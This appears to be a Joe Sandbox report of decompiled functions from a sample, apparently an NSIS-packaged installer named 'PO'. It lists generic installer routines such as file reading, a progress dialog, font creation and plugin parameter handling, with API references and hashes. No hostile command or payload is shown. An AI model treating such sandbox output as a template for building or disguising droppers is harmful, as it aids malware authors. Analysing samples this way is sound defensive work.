Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction ID: 2a82f640caf94e13ad52f77eccc7f6a005bf570db5d4005cc44859485eb84fad
Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction Fuzzy Hash: 9F215171600704ABCB219F68DE08B4BBBF8AF81714F04892DED95E26A0D738E904CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004025E5(intOrPtr __ebx, void* __esi) {
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t73;
				void* _t76;

				 *((intOrPtr*)(_t73 - 0xc)) = __ebx;
				_t64 = 2;
				 *((intOrPtr*)(_t73 - 0x3c)) = _t64;
				_t65 = E00402BA2(_t64);
				_t76 = _t65 - 1;
				 *((intOrPtr*)(_t73 - 0x48)) = _t65;
				if(_t76 < 0) {
					L36:
					 *0x42a2c8 =  *0x42a2c8 +  *(_t73 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x48) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0x10);
						__eax =  *(__ebp - 0xc);
						 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __bx;
						if(_t76 == 0) {
							 *(_t73 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 8) = __ebx;
						 *(__ebp - 0x14) = E004060DE(__ecx, __esi);
						if( *(__ebp - 0x48) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x30)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x20)) != __ebx ||  *(__ebp - 0xc) != __ebx || E00405E34( *(__ebp - 0x14), __ebx) >= 0) {
										__eax = __ebp - 0x40;
										if(E00405DD6( *(__ebp - 0x14), __ebp - 0x40, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x20)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x14), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x20)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x3c) = __ecx;
											 *(__ebp - 0x40) = __eax;
											if( *((intOrPtr*)(__ebp - 0x20)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004060C5( *(__ebp - 0x10), __ax & 0x0000ffff);
											} else {
												__ebp - 0x40 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x40, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x40);
												} else {
													__esi =  *(__ebp - 0x3c);
													__esi =  ~( *(__ebp - 0x3c));
													while(1) {
														_t21 = __ebp - 0x38;
														 *_t21 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x40) = 0xfffd;
														if( *_t21 == 0) {
															goto L22;
														}
														 *(__ebp - 0x3c) =  *(__ebp - 0x3c) - 1;
														__esi = __esi + 1;
														SetFilePointer( *(__ebp - 0x14), __esi, __ebx, 1) = __ebp - 0x40;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x40, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x20)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 8) == 0xd ||  *(__ebp - 8) == 0xa) {
														if( *(__ebp - 8) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x3c) =  ~( *(__ebp - 0x3c));
															__eax = SetFilePointer( *(__ebp - 0x14),  ~( *(__ebp - 0x3c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0x10);
															 *(__ebp - 0xc) =  *(__ebp - 0xc) + 1;
															 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) + 1;
														 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __ax;
														 *(__ebp - 8) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 0xc);
							} while ( *(__ebp - 0xc) <  *(__ebp - 0x48));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004025e7
0x004025ea
0x004025ec
0x004025ef
0x004025f4
0x004025f7
0x004025fa
0x00402a4c
0x00402a4f
0x00402600
0x00402600
0x00402607
0x00402609
0x00402609
0x0040260f
0x00402773
0x00402773
0x00402776
0x0040277b
0x004015ae
0x0040281e
0x0040281e
0x00000000
0x00402615
0x00402616
0x00402621
0x00402624
0x00402630
0x00402634
0x004026cc
0x004026e4
0x004026f4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040263a
0x0040263a
0x0040263d
0x0040263e
0x00402641
0x00402646
0x0040264d
0x00402655
0x00000000
0x0040265b
0x0040265b
0x00402660
0x00000000
0x00402666
0x00402666
0x0040266e
0x00402671
0x00402674
0x0040272f
0x00402736
0x0040267a
0x00402680
0x0040268c
0x004026f6
0x004026f6
0x0040268e
0x0040268e
0x00402691
0x00402693
0x00402693
0x00402693
0x00402696
0x0040269b
0x0040269e
0x00000000
0x00000000
0x004026a0
0x004026a3
0x004026b1
0x004026b7
0x004026c5
0x00000000
0x004026c7
0x00000000
0x004026c7
0x00000000
0x004026c5
0x00402693
0x004026f9
0x004026fc
0x00000000
0x004026fe
0x00402703
0x00402744
0x00402766
0x0040276d
0x00402752
0x00402752
0x00402758
0x0040275b
0x0040275b
0x00000000
0x0040270c
0x0040270c
0x00402712
0x00402718
0x0040271c
0x0040271f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040271f
0x00402703
0x004026fc
0x00402674
0x00402660
0x00402655
0x00000000
0x00402721
0x00402721
0x00402724
0x0040272d
0x00000000
0x00402624
0x0040260f
0x00402a55
0x00402a5b

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405E34: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4A

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
Instruction ID: fbd7f9394f7a40dbbdef10ea3a20ac1ae57b35180e29dd1ddeb30b88b5afce05
Opcode Fuzzy Hash: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
Instruction Fuzzy Hash: 19510774D00219ABDF209F94CA88AAEB779FF04344F50447BE501B72E0D7B99982DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402D9F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402D9F(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x418edc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x418edc = 0;
					return _t15;
				}
				__eflags =  *0x418edc; // 0x0
				if(__eflags != 0) {
					return E00406594(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a24c;
				if(_t6 >  *0x42a24c) {
					__eflags =  *0x42a248;
					if( *0x42a248 == 0) {
						_t7 = CreateDialogParamW( *0x42a240, 0x6f, 0, E00402D04, 0);
						 *0x418edc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a2f4 & 0x00000001;
					if(( *0x42a2f4 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00402D83());
						return E004052DD(0,  &_v132);
					}
				}
				return _t6;
			}

0x00402dae
0x00402db0
0x00402db7
0x00402dba
0x00402dba
0x00402dc0
0x00000000
0x00402dc0
0x00402dc8
0x00402dce
0x00000000
0x00402dd1
0x00402dd8
0x00402dde
0x00402de4
0x00402de6
0x00402dec
0x00402e2a
0x00402e33
0x00000000
0x00402e38
0x00402dee
0x00402df5
0x00402e06
0x00000000
0x00402e14
0x00402df5
0x00402e40

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
GetTickCount.KERNEL32 ref: 00402DD8
wsprintfW.USER32 ref: 00402E06

Part of subcall function 004052DD: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
Part of subcall function 004052DD: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,00402E19), ref: 00405338
Part of subcall function 004052DD: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr9735.tmp\System.dll), ref: 0040534A
Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398

CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
ShowWindow.USER32(00000000,00000005), ref: 00402E38

Part of subcall function 00402D83: MulDiv.KERNEL32(00020CEE,00000064,00025361), ref: 00402D98

Strings

... %d%%, xrefs: 00402E00

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 2598da54cc89f43c600d8ada73a31ae54370e6bdc16888383da25aa760d7781d
Instruction ID: 67f39cb704aca6262626a7976268bb3bb8a333bdab68892006d91dd8afb4411f
Opcode Fuzzy Hash: 2598da54cc89f43c600d8ada73a31ae54370e6bdc16888383da25aa760d7781d
Instruction Fuzzy Hash: 96016D70541614EBC721AB60EF4DA9B7A68AF00706B14417FF885F12E0CBF85865CBEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404BA7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BA7(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404bb5
0x00404bc2
0x00404bc8
0x00404c06
0x00404c06
0x00404c15
0x00404c1c
0x00000000
0x00404c1e
0x00404bca
0x00404bd9
0x00404be1
0x00404be4
0x00404bf6
0x00404bfc
0x00404c03
0x00000000
0x00404c03
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC2
GetMessagePos.USER32 ref: 00404BCA
ScreenToClient.USER32(?,?), ref: 00404BE4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BF6
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C1C

Strings

f, xrefs: 00404BF8

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction ID: 45e0f6331f39cfe7836e80c9775163861a3897288b26a0b158bc224782e9bc0b
Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction Fuzzy Hash: C9015271901218BAEB00DB94DD45FFEBBBCAF54711F10012BBA51B61D0C7B495018B54

Uniqueness

Uniqueness Score: -1.00%

Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00401D56() {
				void* __esi;
				int _t7;
				signed char _t13;
				struct HFONT__* _t16;
				void* _t20;
				struct HDC__* _t26;
				void* _t28;
				void* _t30;

				_t26 = GetDC( *(_t30 - 0xc));
				_t7 = GetDeviceCaps(_t26, 0x5a);
				0x40cde0->lfHeight =  ~(MulDiv(E00402BA2(2), _t7, 0x48));
				ReleaseDC( *(_t30 - 0xc), _t26);
				 *0x40cdf0 = E00402BA2(3);
				_t13 =  *((intOrPtr*)(_t30 - 0x1c));
				 *0x40cdf7 = 1;
				 *0x40cdf4 = _t13 & 0x00000001;
				 *0x40cdf5 = _t13 & 0x00000002;
				 *0x40cdf6 = _t13 & 0x00000004;
				E004061A0(_t20, _t26, _t28, "Times New Roman",  *((intOrPtr*)(_t30 - 0x28)));
				_t16 = CreateFontIndirectW(0x40cde0);
				_push(_t16);
				_push(_t28);
				E004060C5();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401d5f
0x00401d66
0x00401d81
0x00401d86
0x00401d93
0x00401d98
0x00401da3
0x00401daa
0x00401dbc
0x00401dc2
0x00401dc7
0x00401dd1
0x00402531
0x00401565
0x004029f2
0x00402a4f
0x00402a5b

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDE0), ref: 00401DD1

Strings

Times New Roman, xrefs: 00401DB7

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: 020d429652f6eb968a81cc61bdee73d82fb2a6d644655b906a561d6cebbfb8f5
Instruction ID: 9e8fd183d3d9d3ef172346538d4b27734d94fdc92d2c471f4f64b2fa811a60c8
Opcode Fuzzy Hash: 020d429652f6eb968a81cc61bdee73d82fb2a6d644655b906a561d6cebbfb8f5
Instruction Fuzzy Hash: F601A271544641EFEB016BB0AF4AF9A3F75BB65301F104579F152B61E2CA7C0006AB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402D04 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402D04(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402D83();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a250 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402d14
0x00402d22
0x00402d28
0x00402d28
0x00402d36
0x00402d38
0x00402d44
0x00402d49
0x00402d4b
0x00402d4b
0x00402d56
0x00402d66
0x00402d78
0x00402d78
0x00402d80

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
wsprintfW.USER32 ref: 00402D56
SetWindowTextW.USER32(?,?), ref: 00402D66
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78

Strings

verifying installer: %d%%, xrefs: 00402D4B, 00402D54
unpacking data: %d%%, xrefs: 00402D44

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
Instruction ID: 006a23aec332b8a1771af90dfa9c1e08c84c5b856183a3bf167901723993fe13
Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
Instruction Fuzzy Hash: 2FF0367050020CABEF206F50DD49BEA3B69FF44305F00803AFA55B51D0DBF959558F59

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100022D0(void* __edx) {
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t42;
				signed int* _t43;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t42 = 0x1a;
					if(_t52 == _t42) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t42;
							goto L12;
						} else {
							_t38 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t38 = E10001243();
						L11:
						_t52 = _t38;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t43 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t39 =  *_t51;
						_t51[7] = _t51[7] & 0x00000000;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t40;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M1000244C))) {
								case 0:
									 *_t43 =  *_t43 & 0x00000000;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if(lstrlenW(__ebp) > 0) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E1000122C(0x10004044);
					goto L10;
				}
			}

0x100022e4
0x100022e8
0x100022f3
0x100022f3
0x100022fa
0x100022ff
0x00000000
0x00000000
0x10002303
0x10002306
0x00000000
0x00000000
0x1000230b
0x10002316
0x10002326
0x00000000
0x1000231d
0x1000231f
0x10002335
0x00000000
0x10002335
0x1000230d
0x1000230d
0x10002336
0x10002336
0x10002338
0x1000233c
0x1000233c
0x1000233f
0x1000233f
0x10002347
0x10002349
0x10002350
0x10002415
0x10002416
0x10002421
0x1000244b
0x1000244b
0x10002431
0x1000243d
0x10002433
0x10002433
0x10002433
0x00000000
0x10002356
0x10002356
0x00000000
0x1000235d
0x00000000
0x00000000
0x10002366
0x00000000
0x00000000
0x10002374
0x10002376
0x00000000
0x00000000
0x10002397
0x1000239d
0x100023a0
0x100023a2
0x100023b2
0x00000000
0x00000000
0x1000237f
0x10002384
0x10002387
0x10002388
0x00000000
0x00000000
0x100023be
0x100023c4
0x100023c5
0x100023c8
0x100023c9
0x100023cb
0x00000000
0x00000000
0x100023dc
0x100023df
0x100023eb
0x100023ed
0x00000000
0x00000000
0x100023f9
0x10002405
0x10002408
0x1000240a
0x1000240d
0x00000000
0x00000000
0x10002356
0x10002350
